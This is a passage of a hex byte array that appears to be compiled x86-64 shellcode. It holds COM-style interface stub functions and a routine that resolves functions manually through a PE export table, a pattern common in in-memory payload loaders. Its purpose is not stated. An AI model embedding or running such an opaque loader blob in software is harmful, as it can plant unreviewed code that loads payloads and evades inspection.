837 0x45, 0xf8, 0x8b, 0x40, 0x08, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3, 0x55,
838 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89, 0x4d, 0x10, 0x48,
839 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0xf8, 0x48,
840 0x83, 0xc0, 0x08, 0x48, 0x89, 0x45, 0xe8, 0x48, 0x8b, 0x55, 0xe8, 0xb8,
841 0x01, 0x00, 0x00, 0x00, 0xf7, 0xd8, 0x89, 0xc1, 0x89, 0xc8, 0xf0, 0x0f,
842 0xc1, 0x02, 0x01, 0xc8, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0xf4, 0x48, 0x83,
843 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30,
844 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x44, 0x89, 0x45, 0x20,
845 0x4c, 0x89, 0x4d, 0x28, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8,
846 0x8b, 0x45, 0x20, 0x83, 0xe0, 0x02, 0x85, 0xc0, 0x74, 0x39, 0x48, 0x83,
847 0x7d, 0x30, 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x70,
848 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x00, 0x48,
849 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x8b, 0x52, 0x28, 0x48,
850 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x50, 0x28,
851 0x48, 0x8b, 0x45, 0x30, 0x48, 0x89, 0x10, 0x8b, 0x45, 0x20, 0x83, 0xe0,
852 0x01, 0x85, 0xc0, 0x74, 0x36, 0x48, 0x83, 0x7d, 0x28, 0x00, 0x75, 0x07,
853 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x2d, 0x48, 0x8b, 0x45, 0xf8, 0x48,
854 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x55, 0xf8, 0x48,
855 0x83, 0xc2, 0x18, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0xf8,
856 0x48, 0x8d, 0x50, 0x18, 0x48, 0x8b, 0x45, 0x28, 0x48, 0x89, 0x10, 0xb8,
857 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x30, 0x5d, 0xc3, 0x55, 0x48,
858 0x89, 0xe5, 0x48, 0x83, 0xc4, 0x80, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89,
859 0x55, 0x18, 0xc7, 0x45, 0xac, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xa8,
860 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xa4, 0x00, 0x00, 0x00, 0x00, 0x48,
861 0x8d, 0x45, 0xb0, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00,
862 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x26, 0x11, 0x00, 0x00, 0x48, 0x8b,
863 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8d, 0x55,
864 0xb0, 0x48, 0x8b, 0x4d, 0x18, 0xff, 0xd0, 0x89, 0x45, 0xfc, 0x83, 0x7d,
865 0xfc, 0x00, 0x75, 0x20, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48,
866 0x8b, 0x40, 0x20, 0x4c, 0x8d, 0x4d, 0xa4, 0x4c, 0x8d, 0x45, 0xa8, 0x48,
867 0x8d, 0x55, 0xac, 0x48, 0x8b, 0x4d, 0x18, 0xff, 0xd0, 0x89, 0x45, 0xfc,
868 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xec, 0x80, 0x5d, 0xc3, 0x55,
869 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30, 0x48, 0x89, 0x4d, 0x10, 0x48,
870 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0x48,
871 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8b, 0x40, 0x78, 0xff,
872 0xd0, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x18, 0x89, 0x10, 0xb8, 0x00, 0x00,
873 0x00, 0x00, 0x48, 0x83, 0xc4, 0x30, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
874 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x00, 0x00, 0x00,
875 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48,
876 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0xb8, 0x00, 0x00, 0x00, 0x00,
877 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55,
878 0x18, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
879 0x48, 0x89, 0x4d, 0x10, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55,
880 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0xb8, 0x00, 0x00, 0x00, 0x00,
881 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30, 0x48, 0x89,
882 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b,
883 0x00, 0x48, 0x8d, 0x15, 0xb2, 0x02, 0x00, 0x00, 0x48, 0x89, 0x10, 0x48,
884 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x5d, 0x03, 0x00,
885 0x00, 0x48, 0x89, 0x50, 0x08, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
886 0x48, 0x8d, 0x15, 0x7d, 0x03, 0x00, 0x00, 0x48, 0x89, 0x50, 0x10, 0x48,
887 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xa4, 0x03, 0x00,
888 0x00, 0x48, 0x89, 0x50, 0x18, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
889 0x48, 0x8d, 0x15, 0xbd, 0x03, 0x00, 0x00, 0x48, 0x89, 0x50, 0x20, 0x48,
890 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x06, 0x04, 0x00,
891 0x00, 0x48, 0x89, 0x50, 0x28, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
892 0x48, 0x8d, 0x15, 0x37, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x30, 0x48,
893 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x99, 0x04, 0x00,
894 0x00, 0x48, 0x89, 0x50, 0x38, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
895 0x48, 0x8d, 0x15, 0x9a, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x40, 0x48,
896 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x9b, 0x04, 0x00,
897 0x00, 0x48, 0x89, 0x50, 0x48, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
898 0x48, 0x8d, 0x15, 0x9c, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x50, 0x48,
899 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x9d, 0x04, 0x00,
900 0x00, 0x48, 0x89, 0x50, 0x58, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
901 0x48, 0x8d, 0x15, 0x9e, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x60, 0x48,
902 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xa1, 0x04, 0x00,
903 0x00, 0x48, 0x89, 0x50, 0x68, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
904 0x48, 0x8d, 0x15, 0xd3, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x70, 0x48,
905 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xd4, 0x04, 0x00,
906 0x00, 0x48, 0x89, 0x50, 0x78, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
907 0x48, 0x8d, 0x15, 0xd5, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0x80, 0x00,
908 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15,
909 0xd3, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0x88, 0x00, 0x00, 0x00, 0x48,
910 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xd1, 0x04, 0x00,
911 0x00, 0x48, 0x89, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18,
912 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xcf, 0x04, 0x00, 0x00, 0x48, 0x89,
913 0x90, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
914 0x48, 0x8d, 0x15, 0xcd, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xa0, 0x00,
915 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15,
916 0xca, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xa8, 0x00, 0x00, 0x00, 0x48,
917 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xd0, 0x04, 0x00,
918 0x00, 0x48, 0x89, 0x90, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18,
919 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xce, 0x04, 0x00, 0x00, 0x48, 0x89,
920 0x90, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
921 0x48, 0x8d, 0x15, 0xd4, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xc0, 0x00,
922 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15,
923 0xd2, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xc8, 0x00, 0x00, 0x00, 0x48,
924 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xea, 0x04, 0x00,
925 0x00, 0x48, 0x89, 0x90, 0xd0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18,
926 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xec, 0x04, 0x00, 0x00, 0x48, 0x89,
927 0x90, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
928 0x48, 0x8d, 0x15, 0xea, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xe0, 0x00,
929 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15,
930 0xe8, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xe8, 0x00, 0x00, 0x00, 0x48,
931 0x8b, 0x45, 0x18, 0xc7, 0x40, 0x20, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
932 0x45, 0x18, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x50, 0x28, 0x48, 0x8b,
933 0x45, 0x10, 0x48, 0x8b, 0x80, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55,
934 0x18, 0x48, 0x83, 0xc2, 0x08, 0x48, 0x8b, 0x4d, 0x10, 0x48, 0x81, 0xc1,
935 0xdc, 0x03, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x45, 0xfc, 0x83, 0x7d, 0xfc,
936 0x00, 0x75, 0x32, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48,
937 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x55, 0x18, 0x4c, 0x8d,
938 0x42, 0x10, 0x48, 0x8b, 0x55, 0x10, 0x4c, 0x8d, 0x8a, 0x8c, 0x04, 0x00,
939 0x00, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x4a, 0x08, 0x4c, 0x89, 0xca,
940 0xff, 0xd0, 0x89, 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0x48, 0x83, 0xc4, 0x30,
941 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89,
942 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x48, 0x83,
943 0x7d, 0x20, 0x00, 0x75, 0x0a, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xe9, 0x91,
944 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x28, 0x48,
945 0x8d, 0x88, 0xfc, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41, 0xb8,
946 0x10, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0xd4, 0x0d, 0x00, 0x00,
947 0x85, 0xc0, 0x74, 0x4a, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x28,
948 0x48, 0x8d, 0x88, 0x0c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41,
949 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0xaf, 0x0d, 0x00,
950 0x00, 0x85, 0xc0, 0x74, 0x25, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40,
951 0x28, 0x48, 0x8d, 0x88, 0x8c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18,
952 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0x8a, 0x0d,
953 0x00, 0x00, 0x85, 0xc0, 0x75, 0x12, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x8b,
954 0x55, 0x10, 0x48, 0x89, 0x10, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x10,
955 0x48, 0x8b, 0x45, 0x20, 0x48, 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb8,
956 0x02, 0x40, 0x00, 0x80, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48,
957 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x8b,
958 0x45, 0x10, 0x48, 0x83, 0xc0, 0x20, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b,
959 0x45, 0xf8, 0xba, 0x01, 0x00, 0x00, 0x00, 0xf0, 0x0f, 0xc1, 0x10, 0x48,
960 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x20, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3,
961 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10,
962 0x48, 0x8b, 0x45, 0x10, 0x48, 0x83, 0xc0, 0x20, 0x48, 0x89, 0x45, 0xf0,
963 0x48, 0x8b, 0x55, 0xf0, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xf7, 0xd8, 0x89,
964 0xc1, 0x89, 0xc8, 0xf0, 0x0f, 0xc1, 0x02, 0x01, 0xc8, 0x89, 0x45, 0xfc,
965 0x8b, 0x45, 0xfc, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3, 0x55, 0x48, 0x89,
966 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x83, 0x7d,
967 0x18, 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x0f, 0x48,
968 0x8b, 0x45, 0x18, 0xc7, 0x00, 0x01, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00,
969 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20,
970 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x44, 0x89, 0x45, 0x20, 0x4c,
971 0x89, 0x4d, 0x28, 0x48, 0x83, 0x7d, 0x28, 0x00, 0x75, 0x07, 0xb8, 0x03,
972 0x40, 0x00, 0x80, 0xeb, 0x30, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40,
973 0x10, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x55, 0x10,
974 0x48, 0x8b, 0x52, 0x10, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45,
975 0x10, 0x48, 0x8b, 0x50, 0x10, 0x48, 0x8b, 0x45, 0x28, 0x48, 0x89, 0x10,
976 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55,
977 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89, 0x4d, 0x10, 0x48,
978 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x44, 0x89, 0x4d, 0x28, 0x48,
979 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x00, 0x48, 0x8b,
980 0x40, 0x50, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x8b, 0x4a, 0x10, 0x4c, 0x8b,
981 0x4d, 0x38, 0x44, 0x8b, 0x45, 0x28, 0x48, 0x8b, 0x55, 0x20, 0xff, 0xd0,
982 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83,
983 0xec, 0x60, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45,
984 0x20, 0x44, 0x89, 0x4d, 0x28, 0x8b, 0x45, 0x30, 0x66, 0x89, 0x45, 0xec,
985 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x00, 0x48,
986 0x8b, 0x40, 0x58, 0x44, 0x0f, 0xb7, 0x4d, 0xec, 0x48, 0x8b, 0x55, 0x10,
987 0x48, 0x8b, 0x4a, 0x10, 0x44, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x55, 0x50,
988 0x48, 0x89, 0x54, 0x24, 0x38, 0x48, 0x8b, 0x55, 0x48, 0x48, 0x89, 0x54,
989 0x24, 0x30, 0x48, 0x8b, 0x55, 0x40, 0x48, 0x89, 0x54, 0x24, 0x28, 0x48,
990 0x8b, 0x55, 0x38, 0x48, 0x89, 0x54, 0x24, 0x20, 0x48, 0x8b, 0x55, 0x10,
991 0xff, 0xd0, 0x89, 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0x48, 0x83, 0xc4, 0x60,
992 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89,
993 0x55, 0x18, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89,
994 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40,
995 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10,
996 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55,
997 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8,
998 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89,
999 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d,
1000 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x89, 0xd0, 0x66,
1001 0x89, 0x45, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48,
1002 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55,
1003 0x18, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x00,
1004 0x48, 0x8b, 0x40, 0x70, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x8b, 0x4a, 0x18,
1005 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00,
1006 0xba, 0xfd, 0xff, 0xff, 0xff, 0xff, 0xd0, 0xb8, 0x00, 0x00, 0x00, 0x00,
1007 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89,
1008 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d,
1009 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55,
1010 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
1011 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00,
1012 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48,
1013 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48,
1014 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01,
1015 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d,
1016 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3,
1017 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0xb8,
1018 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89,
1019 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x4c, 0x89,
1020 0x4d, 0x28, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89,
1021 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40,
1022 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10,
1023 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d, 0x28,
1024 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48,
1025 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80,
1026 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89,
1027 0x4d, 0x10, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40,
1028 0x28, 0x48, 0x8b, 0x40, 0x68, 0x8b, 0x55, 0x18, 0x89, 0xd1, 0xff, 0xd0,
1029 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55,
1030 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c,
1031 0x89, 0x45, 0x20, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48,
1032 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01,
1033 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d,
1034 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3,
1035 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18,
1036 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0x60,
1037 0x02, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48,
1038 0x89, 0x8d, 0xf0, 0x01, 0x00, 0x00, 0x48, 0x89, 0x95, 0xf8, 0x01, 0x00,
1039 0x00, 0x4c, 0x89, 0x85, 0x00, 0x02, 0x00, 0x00, 0x4c, 0x89, 0x8d, 0x08,
1040 0x02, 0x00, 0x00, 0x48, 0xc7, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x00, 0x00,
1041 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x89, 0x85,
1042 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x8b,
1043 0x40, 0x3c, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00,
1044 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b,
1045 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x05, 0x88, 0x00, 0x00, 0x00, 0x48,
1046 0x89, 0x85, 0xb8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb8, 0x01, 0x00,
1047 0x00, 0x8b, 0x00, 0x89, 0x85, 0xb4, 0x01, 0x00, 0x00, 0x83, 0xbd, 0xb4,
1048 0x01, 0x00, 0x00, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9,
1049 0x9c, 0x03, 0x00, 0x00, 0x8b, 0x95, 0xb4, 0x01, 0x00, 0x00, 0x48, 0x8b,
1050 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xa8,
1051 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x8b, 0x40,
1052 0x18, 0x89, 0x85, 0xd8, 0x01, 0x00, 0x00, 0x83, 0xbd, 0xd8, 0x01, 0x00,
1053 0x00, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x62, 0x03,
1054 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x8b, 0x40, 0x1c,
1055 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0,
1056 0x48, 0x89, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01,
1057 0x00, 0x00, 0x8b, 0x40, 0x20, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01,
1058 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x98, 0x01, 0x00, 0x00,
1059 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x8b, 0x40, 0x24, 0x89, 0xc2,
1060 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89,
1061 0x85, 0x90, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00,
1062 0x8b, 0x40, 0x0c, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00,
1063 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x88, 0x01, 0x00, 0x00, 0xc7, 0x85,
1064 0xdc, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x29, 0x8b, 0x95,
1065 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x88, 0x01, 0x00, 0x00, 0x48,
